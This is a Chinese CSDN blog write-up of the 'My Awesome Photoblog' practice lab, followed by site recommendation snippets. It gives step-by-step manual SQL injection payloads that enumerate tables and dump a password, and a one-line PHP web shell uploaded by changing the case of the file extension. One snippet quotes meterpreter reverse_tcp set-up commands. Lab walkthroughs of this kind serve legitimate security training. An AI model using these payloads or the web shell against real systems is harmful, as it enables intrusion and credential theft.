My Awesome Photoblog解(手注)

已于 2022-07-18 16:38:43 修改
阅读量421 收藏 4
点赞数
文章标签: web安全 网络安全
于 2022-07-18 16:03:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A87591/article/details/125847714
版权

通过浏览页面发现存在3个可能的注入点

加入'试探都报错,均可注入,我这里选择2010即id=3的位置,这里没有图片遮挡

1.判断查询类型:id=3 or '1'='1' -- 1  返回正常页面,为字符型

 

2.判断前面的查询字段数: order by 4-- 1返回正常,order by 5-- 1报错说没有这列,确定为4列。

也可以用        union select 1,2,3,4-- 1  返回正常,确定2为回显位  union select 1,2,3,4,5-- 1时报错

 

3.查数据库名,id=3 union select 1,database(),3,4-- 1 确定数据库名为photoblog

 4.查询表名:id=3 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='photoblog'-- 1

5.查询列名: id=3 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'-- 1

 6.查询账号密码:id=3 union select 1,password,3,4 from users limit 0,1-- 1

7.解码得到密码为:P4ssw0rd

8.登录,发现有一个文件上传

 

 9.写一句话木马文件        <?phpsystem($_GET['cmd']);?>       保存为yijuhua.Php,上传

 

 报错,不允许php修改文件名为        yijuhua.Php        上传,成功

10.用xshell链接ssh IP

(O'v'O)
关注
awesome使用与配置
明何
04-23 1万+
如果你觉得这个文章对你有帮助,留下个脚印吧。 装B是一个艺术活,普通人说爬山,要装B就要说登山。玩电脑也一样,用window的是普通青年,用MAC机就算装B了。 不过至今我都没弄明白MAC有什么让我觉得好玩的,在一大堆条条框框的约束中使用电脑,骗骗纯情的小女生可以,但是也仅此而已。 玩一玩linux也是一个装B的不二之选了。以前用的一直都是ubuntu的界面,当时花了不少时间去弄那些花哨的界
fontawesome 6.1 pro
03-21
Fontawesome 6.1 Pro是一款深受开发者和设计师喜爱的图标库,它提供了丰富的矢量图标、字体和CSS工具,使得在网页设计和开发过程中轻松添加和定制图标成为可能。这个专业版包含了更多高级特性和图标,旨在提升用户...
Photo Album: My Blog Photos
victorpan
02-11 157
My Blog PhotosJAVADesktop.netABCn10Windy Hill - BayWindy Hill - WestGOOGLEStanfordBay BridgeFishman WaterfMore Photos...
My Photo
土哥的BLOG
08-22 593
        
SQL注入(Injection)简介
cnds123的专栏
11-25 6482
SQL注入(Injection)简介 SQL注入(SQL injection),是发生于应用程序与数据库层的安全漏洞。只要是支持处理SQL指令的数据库服务器,都有可能受到此种手法的攻击。 是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。 SQL注入演示 SQL命令
十分钟教你搭建一个漂亮的博客(二--主题的修改)
qq_45353823的博客
03-14 1158
总体效果 框架的选择(butterfly) 前面我们搭建的博客,可以看见非常的单调,那如果我们想要让他变得漂亮,自然我们是不会自己去写代码的,我们通过网上比较成熟的框架,通过修改配置文件便可以得到漂亮的视觉效果。自然我这里选择的是butterfly框架 butterfly 主题的下载 我们进入到上一篇文章所在的文件夹根目录下,进入cmd命令 输入两个命令 git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git
网站综合渗透实验 writeup
3569
07-30 2466
感受 ,做这些实验主要难点我感觉就是上传webshell 了,他插入shell的姿势让我防不胜防,这里插那里插,上一个实验还需要闭合引号,这个实验不用闭合引号,上个实验路径比较简单,这个实验路径比较复杂,尤其是 bear.asp的文件是数据库文件 … 想了好久才想通,到底为什么不用闭合引号 … 为什么路径是/db/bear.asp … 上传sehll有两种方法,都学习了是不吃亏的哦 ~实验过程 :
my-awesome-project
03-19
基础导轨 标准工作流程 设置项目: bin/setup 通过运行bin/server启动Web bin/server 。 导航到您的实时应用程序。 在工作时,请记住导航到/git并在工作时经常提交。 兴趣爱好 ID Concert_id ... ...
my-awesome-project:我想从中赚钱的项目
03-12
在IT行业中,创建一个名为"my-awesome-project"的项目并期望从中获利是常见的做法。这个项目的标题和描述虽然简洁,但暗示了它可能是一个个人或团队的创业尝试,旨在通过技术创新或决特定问题来实现盈利。为了从这...
fontawesome-pro-5.14.0、FontAwesome v4.7、fontawesome-free-6.5.1
03-17
内含fontawesome-pro-5.14.0、FontAwesome v4.7、fontawesome-free-6.5.1三个版本
awesome-guitar:吉他手的有用资源
04-30
很棒的吉他 (初学者)吉他的有用资源 :guitar: 玩家们 您可能还喜欢和。 请在之前阅读。 内容 设备 工具 移动的 网站 .../ r / Guitar-有关吉他的一般说明。... / r / musictheory-关于音乐理论的子目
DVWA_Command Injection(命令注入)
yaowink的博客
05-14 871
命令注入是一个非常大的漏洞,基本上有这个漏洞,系统就可以很容易被拿下。 一、首先,进入DVWA Security 改impossible为Low并提交。 进入Command Injection页面 点击View Source查看源码,源码非常简单,就只有ping,没有任何过滤 在Command Injection页面输入127.0.0.1提交,会显示 输入127.0.0.1&&ipconfig会显示dvwa宿主机的ip地址和DNS 127.0.0.1后..
2021 年职业院校技能大赛“网络安全”项目 江西省比赛任务书
weixin_50463931的博客
12-29 5320
2021 年职业院校技能大赛“网络安全”项目 江西省比赛任务书
命令注入漏洞(2)
weixin_45007073的博客
01-14 418
命令注入漏洞(2) 其实我们除了使用上述的EXP文件进行漏洞利用外,我们还可以使用著名的metasploit进行漏洞的利用 有这些标志表明均是可以使用metasploit利用的漏洞 打开msfconsole进行漏洞利用和监听 msfconsole set payload linux/x86/meterpreter_reverse_tcp set lhost 192.168.101.45 exploit 生成一个静荷用于实现shell反弹 msfvenom -p linux/x86/me
SQL注入靶场实战-MySQL
qq_40467699的博客
04-17 9334
注:本次测试使用纯手工注入,无任何自动化软件辅助。 此靶场是运用了数据值的base64位编码,在转换编码的时候比较困难,手工回显注入无任何差别(无过滤字符)。 这里推荐火狐浏览器的HackBar插件,插件自带编码转换功能比较方便。 靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozh...
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
10-10 1277
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 910
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 429
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值